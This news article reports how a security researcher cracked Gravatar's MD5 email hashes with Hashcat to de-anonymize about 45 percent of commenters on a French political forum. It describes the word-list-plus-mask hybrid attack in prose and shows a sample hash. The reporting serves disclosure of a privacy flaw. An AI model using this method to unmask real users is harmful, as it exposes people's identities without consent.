LAS VEGAS—If you have an account on Github, StackExchange, or any one of countless other sites, there's a good chance hackers can identify the e-mail address you used to register it. That's because Gravatar, a behind-the-scenes service that says it works with millions of sites, broadcasts the information using cryptography that in many cases is trivial to crack.
People have been warning about the privacy risk posed by Gravatar, short for Globally recognized avatar, since at least 2009. That's when a blogger showed he was able to crack the cryptographic hashes that the service uses to uniquely identify its users. Gravatar, it turned out, derived the hashes with the user's e-mail address, and the blogger was able to translate about 10 percent of the more than 80,000 user IDs he harvested. Now, a researcher has upped the ante by using a more advanced cracking technique to de-anonymize participants advocating racial hatred and other extreme topics in online forums hosted in France.
Speaking at the PasswordsCon conference in Las Vegas Wednesday, security researcher Dominique Bongard said he identified 45 percent of the e-mail addresses used to post comments he found in France's most well-known political forum, which he declined to mention by name. His job was made easier by Gravatar's use of the MD5 hash function, which is designed to generate hashes quickly and with a minimum of computing resources. Had Gravatar used bcrypt or another "slow" algorithm, his task would have taken considerably longer. In a country such as France, where there can be severe legal penalties for voicing extreme opinions, extracting the e-mail addresses isn't without its consequences.
"If [adversaries] have your e-mail address at Yahoo dot France, then they can go to the judge, the judge goes to Yahoo and then they get the guy's address," Bongard, who is CEO of Switzerland-based 0xcite, told Ars.
During the discussion, I used my [email protected] address to create my own account on Github. By viewing the page source, I could see that in the process, Github automatically created a Gravatar ID that included the following identifier:
https://secure.gravatar.com/avatar/87d4e3cf6f9c856d0d1ae370a4d81e78?s=140&
The 32-character string 87d4e3cf6f9c856d0d1ae370a4d81e78, it turns out, is the MD5 hash of [email protected], and it's viewable by anyone who takes the time to look.
Bongard was able to decode the hashes using the freely available Hashcat password-cracking program. With a few tweaks, he programmed it to perform what's known as a hybrid attack. One half of the crack ran a word-list attack that contained only the domain addresses of gmail.com and other popular e-mail services. He then added a modified brute-force crack, also known as a mask attack, that ran through all possible eight-character combinations allowed in e-mail addresses. By appending the output of the two techniques, he was able to reach the 45 percent threshold in about a day. No doubt, he could have cracked more with additional time and effort.
I spent time reading the privacy policies for both Gravatar and Github and found no mention that e-mail addresses used to register accounts are disclosed to the world in a hashed format. It's likely that the officials representing those services don't consider the unique cryptographic strings to be personally identifying information. Given the growing ease of cracking them, it's probably time they did.
reader comments
56